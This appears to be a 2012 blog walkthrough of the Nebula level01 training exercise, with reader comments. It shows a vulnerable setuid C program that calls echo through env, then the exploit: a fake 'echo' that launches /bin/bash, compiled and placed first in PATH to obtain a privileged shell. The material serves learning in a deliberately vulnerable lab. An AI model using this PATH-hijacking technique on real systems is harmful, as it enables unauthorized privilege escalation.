Tuesday, 10 April 2012

exploit-exercises.com walkthrough - Nebula level01

Here's the vulnerable source code:
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
 gid_t gid;
 uid_t uid;
 gid = getegid();
 uid = geteuid();

 setresgid(gid, gid, gid);
 setresuid(uid, uid, uid);

 system("/usr/bin/env echo and now what?");
}
The binary file is located in /home/flag01/flag01. After executing it simply echoes the "and now what?" message. It's easy to spot that we have an absolute path to env but echo execution could be altered. We'll achieve this by creating a simple C program in the /home/level01:
#include <stdlib.h>
#include <stdio.h>
void main()
{
       system("/bin/bash");
}

Now we need to compile it:



level01@nebula:~$ gcc -o echo 1.c

 In the next step we will alter the PATH variable value with the following command:



level01@nebula:~$ PATH=/home/level01:$PATH

All we need to do now is running flag01.






level01 completed.





That's it !








Posted by





at
21:15



















Labels:
,
,
,
,
,
,

















3 comments:








  1. Unknown5 July 2013 at 18:55
    I'm sorry to bother you, but could you explain why? how echo was altered? and what the program does you have created?
    ReplyDelete
  2. Pawel Wylecial5 July 2013 at 19:10
    sure,the echo command is issued insecurely by the system() function, we can alter the environment variable PATH so that when echo is called it will first look in the /home/level01 directory, where our simple program is located (the program i created simply executes bash). So instead of running /bin/echo it will run /home/level01/echo.
    ReplyDelete
    Replies
    1. Unknown6 July 2013 at 23:58
      thank you very much for the explanation
      Delete




























        

      









Subscribe to:
Post Comments (Atom)